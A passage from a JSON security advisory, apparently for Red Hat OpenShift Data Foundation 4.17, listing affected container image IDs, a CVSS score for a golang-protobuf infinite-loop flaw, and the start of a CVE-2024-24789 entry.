"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON"
},
{
"cve": "CVE-2024-24789",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2024-06-17T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
